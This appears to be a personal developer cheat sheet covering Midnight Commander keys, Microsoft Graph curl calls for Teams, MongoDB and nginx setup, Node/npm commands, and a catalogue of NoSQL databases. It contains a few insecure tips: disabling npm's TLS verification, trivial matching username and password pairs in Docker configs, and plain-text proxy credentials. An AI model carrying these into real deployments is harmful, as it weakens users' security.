Alt-n Next command into history
Alt-Shift-H Show full history of directories
Alt-y to previous directory in the historY
Alt-u to the next directory in the history
Ctrl-\ directory HotList
Alt-! ???
Alt-s Incremental search (Alt-s again to jump to next occurrence)
Ctrl-s Incremental search (Ctrl-s again to jump to next occurrence)
Alt-Shift-? file search
Alt-i make the other panel show the same directory as the current
Alt-o make the other panel show the subfolder of selected in the current
Alt-c Quick cd dialog
Alt-? Search dialog
Alt-t Toggle mode of the showing files
Alt-g move cursor to first line on the screen
Alt-r move cursor to middle line on the screen
Alt-j move cursor to bottom line on the screen
Alt-e change panel character codEpage
Ctrl-r Refresh directory information
Ctrl-l refresh screen
shell link ( open a remote path over ssh ): sh://user@host:port/path/into/remote/machine

change editor to gedit

export EDITOR=gedit

graph explorer, swagger how to use

microsoft teams example teams read all messages

please, login to Microsoft

afterwards you can retrieve the "Access token"

TOKEN=eyJ0eXAiOiJKV1QiLCJub25jZSI6I...

"my joined teams"

curl 'https://graph.microsoft.com/v1.0/me/joinedTeams' -H "Authorization: Bearer $TOKEN" | jq .

find one of the channels and retrieve its "id", e.g.: "id": "45626dcc-04da-4c2f-a72a-b28b",

GROUP_ID=45626dcc-04da-4c2f-a72a-b28b

"members of the channel "

curl https://graph.microsoft.com/v1.0/groups/$GROUP_ID/members  -H "Authorization: Bearer $TOKEN" | jq .

"channels of a team which I am member of"

curl https://graph.microsoft.com/v1.0/teams/$GROUP_ID/channels  -H "Authorization: Bearer $TOKEN" | jq .

retrieve value.id of the channel, like: "id": "19:[email protected]",

CHANNEL_ID="19:[email protected]"

read messages from the channel : "messages (without replies) in a channel"

curl https://graph.microsoft.com/beta/teams/$GROUP_ID/channels/$CHANNEL_ID/messages -H "Authorization: Bearer $TOKEN" | jq .value[].body.content

teams send message

copy url to channel ( right click on the channel: copy link to channel )

Example: https://teams.microsoft.com/l/channel/19:[email protected]/Allgemein?groupId=ab123bab-xxxx-xxxx-xxxx-xxxx242b&tenantId=ab123bab-xxxx-xxxx-xxxx-xxxxxx198
channel_id="19:[email protected]"
# team-id == groupId
team_id="ab123bab-xxxx-xxxx-xxxx-xxxx242b"

curl -H "Authorization: Bearer $TOKEN" -X POST https://graph.microsoft.com/v1.0/teams/${team_id}/channels/${channel_id}/messages  -H "Content-type: application/json" --data '
{
    "body": {
        "content": "Hello from Robot"
        }
}'

MongoDB cheat sheet

original docker container

docker pull mongo

run container from image

# unexpectedly not working:  -e MONGO_INITDB_ROOT_USERNAME=vitalii -e MONGO_INITDB_ROOT_PASSWORD=vitalii
docker run -d --name mongo -p 27017:27017 -p 28017:28017 -v /tmp/mongo/db:/data/db mongo

connect to existing container and execute 'mongo' tool

  • execute via bash connection
docker exec -it {containerID} /bin/sh
find / -name 'mongo'
mongo --host 127.0.0.1 --port 27017 -u my_user -p my_password --authenticationDatabase my_db
  • exec command directly
docker exec -it {containerID} mongo --host 127.0.0.1 -u my_user -p my_password --authenticationDatabase my_db

create user via bash, mongo eval, execute commands from bash

export MONGO_USER=vitalii
export MONGO_PASS=vitalii
mongo admin --eval "db.createUser({user: '$MONGO_USER', pwd: '$MONGO_PASS', roles:[{role:'root',db:'admin'}]});"

change password via 'mongo' tool

db.changeUserPassword(username, password)
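
for example, run through the container started earlier (container name mongo, credentials and user name are assumptions from the examples above; newer images ship mongosh instead of mongo):

docker exec -it mongo mongo admin -u vitalii -p vitalii \
  --eval "db.changeUserPassword('my_user', 'new_password')"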

start via docker-compose

version: '3.1'
services:
  mongo:
    image: mongo
    restart: always
    ports:
      - 27017:27017
      - 28017:28017
    volumes:
      - /home/technik/projects/ista/mongo-docker/container-map-folder:/data/db
    environment:
      MONGO_INITDB_ROOT_USERNAME: vitalii
      MONGO_INITDB_ROOT_PASSWORD: vitalii

  mongo-express:
    image: mongo-express
    restart: always
    ports:
      - 28018:8081
    environment:
      ME_CONFIG_MONGODB_ADMINUSERNAME: vitalii
      ME_CONFIG_MONGODB_ADMINPASSWORD: vitalii

discover environment, meta-information 'mongo' tool

commands description
show dbs Shows all databases available on this server
use acmegrocery Switches to a database called acmegrocery. Creates this database if it doesn’t already exist.
show collections Show all collections in the current db (first use <someDb>)
show users Show all users for the current DB
show roles Show the roles defined for the current DB
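
a few basic document operations from the mongo shell, runnable through the container above (container, database and collection names are just examples; newer images use mongosh):

docker exec -it mongo mongo my_db --eval '
  db.users.insertOne({name: "vitalii", role: "admin"});
  db.users.updateOne({name: "vitalii"}, {$set: {active: true}});
  db.users.find({role: "admin"}).forEach(printjson);
  db.users.deleteOne({name: "vitalii"});
'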

networking

Browser

uses the local DNS cache first and queries DNS only when the name is not found there

DNS record types ( see the dig examples below )

  • A ( IPv4 address )
  • AAAA ( IPv6 address )
  • CNAME ( alias )
  • MX ( Mail eXchange )
  • NS ( NameServer )
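
each record type can be queried directly with dig (assumes dnsutils/bind-utils installed; example.com is a placeholder):

dig example.com A     +short   # IPv4 address
dig example.com AAAA  +short   # IPv6 address
dig example.com CNAME +short   # alias
dig example.com MX    +short   # mail exchange
dig example.com NS    +short   # name servers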

nginx cheat sheet

managing

sudo systemctl restart nginx
sudo nginx -s reload
sudo systemctl status nginx

nginx variables

sudo vim /etc/nginx/sites-available/appbridge
cat /etc/nginx/sites-available/appbridge
server {
        listen 80;
        listen 443;
        listen [::]:80;
        listen [::]:443;

        server_name appbridge.myhost.com;

        location / {
            proxy_set_header    X-Real-IP           $realip_remote_addr;
            proxy_set_header    X-Forwarded-For     $proxy_add_x_forwarded_for;
            proxy_set_header    Host                $http_host;
            proxy_set_header    X-Forwarded-Proto   $scheme;
            proxy_pass          http://localhost:5001/;
            proxy_set_header    X-Forwarded-Host    $host;
            proxy_set_header    X-Forwarded-Server  $server_name;

        }
}
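
before restarting/reloading it is worth validating the configuration (standard nginx options):

# check configuration syntax
sudo nginx -t
# apply changes without dropping connections
sudo systemctl reload nginx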

NodeJS cheat sheet

installation

tools

run different node version

run different node versions locally

sudo npm install -g n 
n ls
sudo n install 13.8
n exec 13.8 node --version
n exec 20.3 node --version
nvm install 12;
nvm use 12;
node -v

run node in docker, docker running, run node with version

node docker tags

# NODE_VERSION=16.15.0
NODE_VERSION=14.21.1-alpine
docker run --volume $PWD:/app -it node:$NODE_VERSION /bin/bash
cd /app
node --version

command line arguments

javascript REPL

node 

RUNNING YOUR CODE

# Evaluates the current argument as JavaScript
node --eval
# Checks the syntax of a script without executing it
node --check
# Opens the node.js REPL (Read-Eval-Print-Loop)
node --interactive
# Pre-loads a specific module at start-up
node --require
# Silences the deprecation warnings
node --no-deprecation
# Silences all warnings (including deprecations)
node --no-warnings
# Environment variable that you can use to set command line options
echo $NODE_OPTIONS
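
for example (app.js and ./setup.js are placeholder file names):

# evaluate a snippet directly
node --eval 'console.log(process.version)'
# syntax-check a file without running it
node --check app.js
# preload a module before the main script
node --require ./setup.js app.js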

CODE HYGIENE

# Emits pending deprecation warnings
node --pending-deprecation
# Prints the stack trace for deprecations
node --trace-deprecation
# Throws error on deprecation
node --throw-deprecation
# Prints the stack trace for warnings
node --trace-warnings

INITIAL PROBLEM INVESTIGATION

# Generates node report on signal
node --report-on-signal
# Generates node report on fatal error
node --report-on-fatalerror
# Generates diagnostic report on uncaught exceptions
node --report-uncaught-exception

CONTROLLING/INVESTIGATING MEMORY USE

# Sets the size of the heap
--max-old-space-size
# Turns on gc logging
--trace_gc
# Enables heap profiling
--heap-prof
# Generates heap snapshot on specified signal
--heapsnapshot-signal=signal

CPU PERFORMANCE INVESTIGATION

# Generates V8 profiler output
--prof
# Process V8 profiler output generated using --prof
--prof-process
# Starts the V8 CPU profiler on start up, and writes the CPU profile to disk before exit
--cpu-prof

DEBUGGING

# Activates inspector on host:port and break at start of user script
--inspect-brk[=[host:]port]
# Activates inspector on host:port (default: 127.0.0.1:9229)
--inspect[=[host:]port]

npm

config

npm config ls
npm config list

npm registry

remove registry

npm config delete registry

set registry

# how to set registry
npm config set strict-ssl false
npm config set registry https://registry.npmjs.org/

or adjust environment

NPM_CONFIG_REGISTRY=https://registry.npmjs.org/

add additional registry

npm config set @my-personal-repo:registry https://ci.ubs.com/nexus/repository/cds-npm

or update your .npmrc

@my-personal-repo:registry=https://ci.ubs.com/nexus/repository/cds-npm
npm install @my-personal-repo/my-component

proxy

npm config set proxy [url:port]
npm config set https-proxy [url:port]

npm config get proxy
npm config get https-proxy

proxy in .npmrc

vim ~/.npmrc
proxy=http://user:[email protected]:8080/
https-proxy=http://user:[email protected]:8080/
;prefix=~/.npm-global

npm version

npm info coa
npm info coa versions

check installation

npm bin -g

package control

# best practice
# package-lock.json must have be present in root ( under git control )
npm ci

permission denied for folder /usr/lib

# create new folder where node will place all packages
mkdir ~/.npm-global

# Configure npm to use new folder
npm config set prefix '~/.npm-global'

# update your settings in ```vim ~/.profile```
export PATH=~/.npm-global/bin:$PATH

print high level packages

npm list -g --depth=0

reinstall package globally

npm search @angular

# full package name
npm uninstall -g @angular/cli
# uninstall by name 
# npm uninstall -g fx

npm cache clear --force
npm install -g @angular/cli 

show package version

npm show styled-components@* version

install package version

npm install [email protected]
# if you don't know certain version
npm install styled-components@^3.0.0

install with package registry

npm install [email protected] --registry=https://artifactory.ubs.net/artifactory/api/npm/external-npmjs-org/ --force

build project ( install dependencies )

npm install
npm start

start from different folder, start with special marker

npm start --prefix /path/to/api "special_app_marker_for_ps_aux"

start with different port

  • package.json solution
 "scripts": {"start": "PORT=3310 node ./bin/www"},
  • npm solution
PORT=$PORT npm --prefix $PROJECT_HOME/api start 
PORT=$PORT npm --prefix $PROJECT_HOME/api run start 

eject configuration to static files

npm run eject
# config/webpack.config.dev.js
# config/webpack.config.prod.js
# config/webpackDevServer.config.js
# config/env.js
# config/paths.js
# config/polyfills.js

yarn package manager

yarn config list

NextJS

npx create-next-app my-app

start nextjs

npm run-script build
npm run-script start
# or ( the same for debug )
node server.js

nextjs in real environment

nextjs-how-to

NoSQL

my own cheat-sheets

databases by types

scalable and ACID and ( relational and/or SQL-access )

Wide Column Store / Column Families

  • API: Java / any writer,
  • Protocol: any write call,
  • Query Method: MapReduce Java / any exec,
  • Replication: HDFS Replication,
  • Written in: Java,
  • Concurrency: ?,
  • Misc: Links: 3 Books [1, 2, 3], Article >>

massively scalable, partitioned row store, masterless architecture, linear scale performance, no single points of failure, read/write support across multiple data centers & cloud availability zones. API /

  • Query Method: CQL and Thrift,
  • replication: peer-to-peer,
  • written in: Java,
  • Concurrency: tunable consistency,
  • Misc: built-in data compression, MapReduce support, primary/secondary indexes, security features.
  • Links:

Cassandra-compatible column store, with consistent low latency and more transactions per second. Designed with a thread-per-core model to maximize performance on modern multicore hardware. Predictable scaling. No garbage collection pauses, and faster compaction.

  • API: Thrift (Java, PHP, Perl, Python, Ruby, etc.),
  • Protocol: Thrift,
  • Query Method: HQL, native Thrift API,
  • Replication: HDFS Replication,
  • Concurrency: MVCC,
  • Consistency Model: Fully consistent
  • Misc: High performance C++ implementation of Google's Bigtable. » Commercial support

Accumulo is based on BigTable and is built on top of Hadoop, Zookeeper, and Thrift. It features improvements on the BigTable design in the form of cell-based access control, improved compression, and a server-side programming mechanism that can modify key/value pairs at various points in the data management process.

  • Misc: not open source / part of AWS, Book (will be outperformed by DynamoDB!)

Google's Big table clone like HBase. » Article

Column Store pioneer since 2002.

from LexisNexis, article

(formerly known as Stratosphere) massively parallel & flexible data analytics platform,

  • API: Java, Scala,
  • Query Method: expressive data flows (extended M/R, rich UDFs, iteration support),
  • Data Store: independent (e.g., HDFS, S3, MongoDB),
  • Written in: Java, License: Apache License V2.0,
  • Misc: good integration with Hadoop stack (HDFS, YARN), source code on Github

horizontally and vertically scalable, relational, partitioned row store, document store API /

  • Query Method: SQL (native, DRDA, JDBC, ODBC), MongoDB wire listener, mixed mode,
  • replication: master / slave, peer-to-peer, sharding, grid operations,
  • written in: C,
  • Concurrency: row, page, table, db locking,
  • Misc: ACID, built-in data compression, scheduler, automatic cyclic storage management, extensible, in memory acceleration, native ports from ARM v6 up
  • Links: Documentation, IIUG, Company.

Splice Machine is an RDBMS built on Hadoop, HBase and Derby. Scale real-time applications using commodity hardware without application rewrites, Features: ACID transactions, ANSI SQL support, ODBC/JDBC, distributed computing

massively scalable in-memory and persistent storage DBMS for analytics on market data (and other time series data). APIs: C/C++, Java Native Interface (JNI), C#/.NET), Python, SQL (native, ODBC, JDBC), Data layout: row, columnar, hybrid,

  • Written in: C,
  • Replication: master/slave, cluster, sharding,
  • Concurrency: Optimistic (MVCC) and pessimistic (locking)

a distributed self-tuning database with

  • automatic indexing
  • version control and ACID transactions.
  • Written In: Java. API/
  • Protocol: Thrift (many languages).
  • Concurrency: serializable transactions with just-in-time locking.
  • Misc: uses a buffered storage system to commit all data to disk immediately while perform rich indexing in the background.

open-source analytics

  • data store for business intelligence (OLAP) queries on event data. Low latency (real-time) data ingestion, flexible data exploration, fast data aggregation. Scaled to trillions of events & petabytes. Most commonly used to power user-facing analytic applications.
  • API: JSON over HTTP, APIs: Python, R, Javascript, Node, Clojure, Ruby, Typescript + support SQL queries
  • Written in: Java License: Apache 2.0
  • Replication: Master/Slave

Apache Kudu (incubating) completes Hadoop's storage layer to enable fast analytics on fast data.

Elassandra is a fork of Elasticsearch modified to run on top of Apache Cassandra in a scalable and resilient peer-to-peer architecture. Elasticsearch code is embedded in Cassandra nodes providing advanced search features on Cassandra tables, and Cassandra serves as an Elasticsearch data and configuration store. [OpenNeptune, Qbase, KDI]

Document Store

  • API: REST and many languages,
  • Protocol: REST,
  • Query Method: via JSON,
  • Replication + Sharding: automatic and configurable,
  • written in: Java,
  • Misc: schema mapping, multi tenancy with arbitrary indexes, » Company and Support, » Article
  • API: BSON,
  • Protocol: C,
  • Query Method: dynamic object-based language & MapReduce,
  • Replication: Master Slave & Auto-Sharding,
  • Written in: C++,
  • Concurrency: Update in Place.
  • Misc: Indexing, GridFS, Freeware + Commercial License
  • Links: » Talk, » Notes, » Company

A fully managed Document store with multi-master replication across data centers. Originally part of Google App Engine, it also has REST and gRPC APIs. Now Firestore?!

is a fully managed, globally distributed NoSQL database perfect for the massive scale and low latency needs of modern applications. Guarantees: 99.99% availability, 99% of reads at <10ms and 99% of writes at <15ms. Scale to handle 10s-100s of millions of requests/sec and replicate globally with the click of a button. APIs: .NET, .NET Core, Java, Node.js, Python, REST. Query: SQL.

  • API: protobuf-based,
  • Query Method: unified chainable query language (incl. JOINs, sub-queries, MapReduce, GroupedMapReduce);
  • Replication: Sync and Async Master Slave with per-table acknowledgements, Sharding: guided range-based,
  • Written in: C++,
  • Concurrency: MVCC.
  • Misc: log-structured storage engine with concurrent incremental garbage compactor
  • API: Memcached API+protocol (binary and ASCII), most languages,
  • Protocol: Memcached REST interface for cluster conf + management,
  • Written in: C/C++ + Erlang (clustering),
  • Replication: Peer to Peer, fully consistent,
  • Misc: Transparent topology changes during operation, provides memcached-compatible caching buckets, commercially supported version available,
  • Links: » Wiki, » Article
  • API: MongoDB API and SQL,
  • Protocol: MongoDB Wire Protocol / MongoDB compatible,
  • Query Method: dynamic object-based language & SQL,
  • Replication: RDBMS backends' replication system & support for replication from MongoDB's Replica Set,
  • Written in: Java,
  • Concurrency: MVCC.
  • Misc: Open Source NoSQL and SQL database. The agileness of a doc DB with the reliability and the native SQL capabilities of PostgreSQL.
  • API: BSON,
  • Protocol: C,
  • Query Method: dynamic object-based language,
  • Replication: Master Slave & Auto-Sharding,
  • Written in: C++,
  • Misc: Indexing, Large Object Store, Transaction, Free + Commercial License, Benchmark, Code

a 100% native .NET Open Source NoSQL Document Database (Apache 2.0 License).
It also supports SQL querying over JSON Documents.
Data can also be accessed through LINQ & ADO.NET.
NosDB also provides strong server-side and client-side caching features by integrating NCache.

.Net solution. Provides HTTP/JSON access. LINQ queries & Sharding supported.
Misc

(developer+commercial)

  • API: JSON, XML, Java
  • Protocols: HTTP, REST
  • Query Method: Full Text Search and Structured Query, XPath, XQuery, Range, Geospatial, Bitemporal
  • Written in: C++
  • Concurrency: Shared-nothing cluster, MVCC
  • Misc: Petabyte-scalable and elastic (on premise or in the cloud), ACID + XA transactions, auto-sharding, failover, master slave replication (clusters), replication (within cluster), high availability, disaster recovery, full and incremental backups, government grade security at the doc level, developer community »

(freeware+commercial)

  • API: XML, PHP, Java, .NET
  • Protocols: HTTP, REST, native TCP/IP
  • Query Method: full text search, XML, range and Xpath queries;
  • Written in C++
  • Concurrency: ACID-compliant, transactional, multi-master cluster
  • Misc: Petabyte-scalable document store and full text search engine. Information ranking.
  • Replication. Cloudable.

Object Document Mapper for JSON-Documents

  • written in pure JavaScript. It queries the collections with a gremlin-like DSL that uses MongoDB's API methods, but also provides joining. The collections extend the native array objects, which gives the overall ODM a good performance. Queries 500,000 elements in less than a second.

NoSQL database for Node.js in pure javascript. It implements the most commonly used subset of MongoDB's API and is quite fast (about 25,000 reads/s on a 10,000 documents collection with indexing).

  • API: Java & http,
  • Protocol: http, Language: Java, Querying: Range queries, Predicates,
  • Replication: Partitioned with consistent hashing, Consistency: Per-record strict consistency,
  • Misc: Based on Terracotta

Architected to unify the best of search engine, NoSQL and NewSQL DB technologies.

  • API: REST and many languages.
  • Query method: SQL.
  • Written in C++.
  • Concurrency: MVCC.
  • Misc: ACID transactions, data distribution via consistent hashing, static and dynamic schema support, in-memory processing. Freeware + Commercial License

Lightweight open source document database

  • written in Java for high performance, runs in-memory, supports Android.
  • API: JSON, Java
  • Query Method: REST OData Style Query language, Java fluent Query API
  • Concurrency: Atomic document writes Indexes: eventually consistent indexes

JSON based, Document store database with compiled .net map functions and automatic hybrid bitmap indexing and LINQ query filters

  • API: BSON,
  • Protocol: C++,
  • Query Method: dynamic queries and map/reduce, Drivers: Java, C++, PHP
  • Misc: ACID compliant, Full shell console over google v8 engine, djondb requirements are submitted by users, not market. License: GPL and commercial

Embedded JSON database engine based on tokyocabinet.

  • API: C/C++, C# (.Net, Mono), Lua, Ruby, Python, Node.js binding,
  • Protocol: Native,
  • Written in: C, Query language: mongodb-like dynamic queries,
  • Concurrency: RW locking, transactional ,
  • Misc: Indexing, collection level rw locking, collection level transactions, collection joins., License: LGPL

DensoDB is a new NoSQL document database.

  • Written for .Net environment in c# language. It’s simple, fast and reliable. Source

A Document Store on top of SQL-Server.

For small online databases, PHP / JSON interface, implemented in PHP.

Node.js asynchronous NoSQL embedded database for small websites or projects. Database supports: insert, update, remove, drop and supports views (create, drop, read).

  • Written in JavaScript, no dependencies, implements small
  • concurrency model.

Uses Apache Thrift to integrate multiple backend databases as BerkeleyDB, Disk, MySQL, S3.

Transactional embedded database, it can embed into mobile, desktop and web applications, supports on-disk and in-memory storages.

  • API: Java,C# (Android, Mono, Xamarin, Unity3D).
  • Query Method: SQL-like and KeyValue.
  • Written In: Java, C#.
  • Replication: MasterSlave, MasterMaster.
  • API: Java/.NET.
  • Written in: Java.
  • Replication: Master/Slave. License: AGLP. Historical queries. ACID. Schemaless.
  • Concurrency: STM and persistent data structure. Append-only storage. Encrypted storage. Flexible durability control. Secondary & composite indexes. Transparently serializes Java/.NET objects.

100% JavaScript automatically synchronizing multi-model database with a SQL like syntax (JOQULAR) and swappable persistence stores. It supports joins, nested matches, projections or live object result sets, asynchronous cursors, streaming analytics, 18 built-in predicates, in-line predicates, predicate extensibility, indexable computed values, fully indexed Dates and Arrays, built in statistical sampling. Persistence engines include files, Redis, LocalStorage, block storage, and more.

Cloud based, open-source, zero-config. Based on CouchDB and BigCouch.

  • API: XQJ/XDM, REST, OpenAPI,
  • Protocols: Java, HTTP,
  • Query Method: distributed XQuery + server-side XQuery/Java extensions,
  • Written in: Java,
  • Concurrency: MVCC, Document format: XML, JSON, POJO, Avro, Protobuf, etc.
  • Misc: in-memory Data and Computation Grid, transparent replication and fail-over, true horizontal scalability, ACID transactions, rich indexing and trigger capabilities, pluggable persistent store, pluggable data formats. GitHub

Key Value / Tuple Store

Automatic ultra scalable NoSQL DB based on fast SSDs. Multiple Availability Zones. Elastic MapReduce Integration. Backup to S3 and much more...

Collections of free form entities (row key, partition key, timestamp). Blob and Queue Storage available, 3 times redundant. Accessible via REST or ATOM.

  • API: tons of languages, JSON,
  • Protocol: REST,
  • Query Method: MapReduce term matching , Scaling: Multiple Masters;
  • Written in: Erlang,
  • Concurrency: eventually consistent (stronger than MVCC via Vector Clocks)
  • API: Tons of languages,
  • Written in: C,
  • Concurrency: in memory and saves asynchronous disk after a defined time. Append only mode available. Different kinds of fsync policies.
  • Replication: Master / Slave,
  • Misc: also lists, sets, sorted sets, hashes, queues. Cheat-Sheet: », great slides » Admin UI » From the Ground up »

Fast and web-scale database. RAM or SSD. Predictable performance; achieves 2.5 M TPS (reads and writes), 99% under 1 ms. Tunable consistency. Replicated, zero configuration, zero downtime, auto-clustering, rolling upgrades, Cross Datacenter

Fast & Batch updates. DB from Google.

  • API: C++.
  • Written in C++. Facebook`s improvements to Google`s LevelDB to speed throughput for datasets larger than RAM. Embedded solution.
  • API: Many languages,
  • Written in: C,
  • Replication: Master / Slave,
  • Concurrency: MVCC, License: Sleepycat, Berkeley DB Java Edition:
  • API: Java,
  • Written in: Java,
  • Replication: Master / Slave,
  • Concurrency: serializable transaction isolation, License: Sleepycat

Immediate consistency sharded KV store with an eventually consistent AP store bringing eventual consistency issues down to the theoretical minimum. It features efficient record coalescing. GenieDB speaks SQL and co-exists with / does inter-table joins with SQL RDBMSs.

  • API: Get,Put,Delete,
  • Protocol: Native, HTTP, Flavor: Embedded, Network, Elastic Cache,
  • Replication: P2P based Network Overlay,
  • Written in: C++,
  • Concurrency: ?,
  • Misc: robust, crash proof, Elastic, throw machines to scale linearly, Btree/Ehash
  • API: Java & simple RPC to vals,
  • Protocol: internal,
  • Query Method: M/R inside value objects, Scaling: every node is master for its slice of namespace,
  • Written in: Java,
  • Concurrency: serializable transaction isolation,
  • Written in: Erlang,
  • Replication: Strong consistency over replicas,
  • Concurrency: non blocking Paxos.
  • Links:
    • nice talk »,
    • slides »,
  • Protocol: http (text, html, JSON), C, C++, Python, Java, Ruby, PHP,Perl.
  • Concurrency: Paxos.

Open-Source implementation of Amazons Dynamo Key-Value Store.

Open-Source implementation of Amazons Dynamo Key-Value Store.

  • written in Erlang. With "data partitioning, versioning, and read repair, and user-provided storage engines provide persistence and query processing".

Open Source Amazon Dynamo implementation,

  • API: Memcache protocol (get, set, add, replace, etc.),
  • Written in: C, Data Model: Blob,
  • Misc: Is Memcached writing to BerkeleyDB.
  • API: C, C++, C#, Java, PHP, Perl,
  • Written in: C,C++.
  • Misc: Transaction logging. Client/server. Embedded. SQL wrapper (not core). Been around since 1979.

Key-Value database that was written as part of SQLite4,
They claim it is faster than LevelDB.
Instead of supporting custom comparators, they have a recommended data encoding for keys that allows various data types to be sorted.

A fast, efficient on-disk

  • data store for Windows Phone 8, Windows RT, Win32 (x86 & x64) and .NET. Provides for key-value and multiple segmented key access. APIs for C#, VB, C++, C and HTML5/JavaScript.
  • Written in pure C for high performance and low footprint. Supports async and synchronous operations with 2GB max record size.

embedded solution

  • API: C, C++, .NET, Java, Erlang.
  • Written in C,C++. Fast key/value store with a parameterized B+-tree. Keys are "typed" (i.e. 32bit integers, floats, variable length or fixed length binary data). Has built-in analytical functions like SUM, AVERAGE etc.
  • API: C#,
  • Written in C#, embedded solution, generic XTable<TKey,TRecord> implementation, ACID transactions, snapshots, table versions, shared records, vertical data compression, custom compression, composite & custom primary keys, available backend file system layer, works over multiple volumes, petabyte scalability, LINQ.
  • API: C, Perl, PHP, Python, Java and Ruby.
  • Written in: Objective C ,
  • Protocol: asynchronous binary, memcached, text (Lua console). Data model: collections of dimensionless tuples, indexed using primary + secondary keys.
  • Concurrency: lock-free in memory, consistent with disk (write ahead log).
  • Replication: master/slave, configurable. Other: call Lua stored procedures.

In-memory (opt. persistence via mmap), highly concurrent, low-latency key-value store.

  • API: Java.
  • Written in: Java.
  • Protocol: in-process Java, remote via Chronicle Engine + Wire: binary, text, Java, C# bindings.
  • Concurrency: in-memory lock striping, read-write locks.
  • Replication: multi-master, eventually consistent.
  • API: C,
  • Query Method: MQL, native API,
  • Replication: DFS replication, Consistency: strict consistency
  • Written in: C.

For geolocalized apps.

  • Concurrency: in-memory with asynchronous disk writes.
  • API: HTTP/JSON.
  • Written in: C. License: BSD.

A pure key value store with optimized b+tree and murmur hashing. (In the near future it will be a JSON document database much like mongodb and couchdb.)

peer-to-peer distributed in-memory (with persistence) datagrid that implements and expands on the concept of the Tuple Space. Has SQL Queries and ACID (=> NewSQL).

Key-Value concept. Variable number of keys per record. Multiple key values, Hierarchic records. Relationships. Diff. record types in same DB. Indexing: B*-Tree. All aspects configurable. Full scripting language. Multi-user ACID. Web interfaces (PHP, Perl, ActionScript) plus Windows client.

A fast key-value Database (using LSM-Tree storage engine),

  • API: Redis protocol (SET,MSET,GET,MGET,DEL etc.),
  • Written in: ANSI C

Distributed searchable key-value store. Fast (latency & throughput), scalable, consistent, fault tolerant, using hyperspace hashing. APIs for C, C++ and Python.

Fast, open source, shared memory (using memory mapped files e.g. in /dev/shm or on SSD), multi process, hash table, e.g. on an 8 core i7-3720QM CPU @ 2.60GHz using /dev/shm, 8 processes combined have a 12.2 million / 2.5 to 5.9 million TPS read/write using small binary keys to a hash file containing 50 million keys. Uses sharding internally to mitigate lock contention.

  • Written in C.

Ultra-fast, ultra-compact key-value embedded

  • data store developed by Symas for the OpenLDAP Project. It uses memory-mapped files, so it has the read performance of a pure in-memory database while still offering the persistence of standard disk-based databases, and is limited only by the size of the virtual address space (not by the size of physical RAM).

Sophia is a modern embeddable key-value database designed for a high load environment. It has a unique architecture that was created as a result of research and rethinking of the primary algorithmic constraints associated with the increasingly popular log-file based data structures, such as LSM-tree. Implemented as a small, BSD-licensed library

  • written in C.

.NET Open Source Distributed Cache.

  • Written in C#. API .NET & Java. Query Parallel SQL Query, LINQ & Tags.
  • Misc: Linear Scalability, High Availability, WAN
  • Replication, GUI based Administration & Monitoring Tools, Messaging, Runtime Data Sharing, Cache & Item Level Events, Continuous Query & Custom Events, DB Dependencies & Expirations

Open Source In-Memory JCache compliant Data Grid.

  • Written in Java. API Java, JCache JSR 107 & .NET. Query SQL & DB Synchronization.
  • Misc: Linear Scalability, High Availability, WAN
  • Replication, GUI based Administration & Monitoring Tools, Distributed Messaging, MapReduce, Entry Processor and Aggregator

Redis inspired K/V store for Python object serialization.

(ErlangDB »)

(based on Tokyo Tyrant)

Hibari is a highly available, strongly consistent, durable, distributed key-value

  • data store

Key-value store, B+tree. Lightning fast reads+fast bulk loads. Memory-mapped files for persistent storage with all the speed of an in-memory database. No tuning conf required. Full ACID support. MVCC, readers run lockless. Tiny code,

  • written in C, compiles to under 32KB of x86-64 object code. Modeled after the BerkeleyDB API for easy migration from Berkeley-based code. Benchmarks against LevelDB, Kyoto Cabinet, SQLite3, and BerkeleyDB are available, plus full paper and presentation slides.

High availability,

  • concurrency-oriented event-based K/V database with transactions and causal consistency.
  • Protocol: MsgPack,
  • API: Erlang, Elixir, Node.js.
  • Written in: Elixir, Github-Repo.

BinaryRage is designed to be a lightweight ultra fast key/value store for .NET with no dependencies. Tested with more than 200,000 complex objects

  • written to disk per second on a crappy laptop :-) No configuration, no strange driver/connector, no server, no setup - simply reference the dll and start using it in less than a minute.

Github Page »

Professional, open-source, NoSql (embedded Key/Value storage), transactional, ACID-compliant, multi-threaded, object database management system for .NET 3.0+ and Mono.

  • Written in C#.
  • API: Scala.
  • Written in Scala.
  • Replication: Replicas vote on writes and reads. Sharding: Hashes keys onto array of replica cohorts.
  • Concurrency: Optimistic + Multiversion Concurrency Control. Provides multirow atomic writes. Exposes optimistic concurrency through API to support HTTP Etags. Embedded solution.

Key/Value DB

  • written in Go.

Serenity database implements basic Redis commands and extends them with support for Consistent Cursors, ACID transactions, Stored procedures, etc. The database is designed to store data bigger than available RAM.

  • API: Memcached.
  • Written in C++. In-memory LRU cache with very small memory footprint. Works within fixed amount of memory. Cachelot has a C++ cache library and stand-alone server on top of it.

Use a JSON encoded file to automatically save a JavaScript value to disk whenever that value changes. A value can be a Javascript: string, number, boolean, null, object, or an array. The value can be structured in an array or an object to allow for more complex

  • data stores. These structures can also be nested. As a result, you can use this module as a simple document store for storing semistructured data.

InfinityDB is an all-Java embedded DBMS with access like java.util.concurrent.ConcurrentNavigableMap over a tuple space, enhanced for nested Maps, LOBs, huge sparse arrays, wide tables with no size constraints. Transactions, compression, multi-core

  • concurrency, easy schema evolution. Avoid the text/binary trap: strongly-typed, fine-grained access to big structures. 1M ops/sec. Commercial, closed source, patented.

Key Value Store with scripting language. Data types include list, dictionary and set. Hierarchical keys.

  • API: TCP/IP,
  • Protocol: Query language,
  • Written in: Delphi, License: MIT,
  • Links: Github

In-Memory, scale-by-cell division (under load), multi-tiered scalability (transactions, entries, indices), read=write, geo-redundancy, redundancy per datatype, LDAP, API, bulkload facility for VNF state resiliency, VNF-M integratable, self-[re-]balancing, Backend for Mobile Network Functions

The C/C++ persistent key/value storage engine based on skip list data structure.

  • API: C/C++.
  • Protocol: Native. Written in: C11,
  • Concurrency: RW locking. License: MIT

A distributed

  • data store for multi-dimensional data. BBoxDB enhances the key-value data model by a bounding box, which describes the location of a value in an n-dimensional space. Data can be efficiently retrieved using hyperrectangle queries. Spatial joins and dynamic data redistribution are also supported.
  • API: Java,
  • Protocol: asynchronous binary, Data model: Key-bounding-box-value, Scaling: Auto-Sharding, Replication,
  • Written in: Java,
  • Concurrency: eventually consistent / RW locking

An HTTP based, user facing, RESTful NoSQL cache server based on HAProxy. It can be used as an internal NoSQL cache that sits between your application and database (like Memcached or Redis), as well as a user facing NoSQL cache that sits between the end user and your application. It supports headers and cookies, so you can store per-user data at the same endpoint.

  • Protocol: HTTP. Written in: C.

A lightweight in-memory document-oriented database

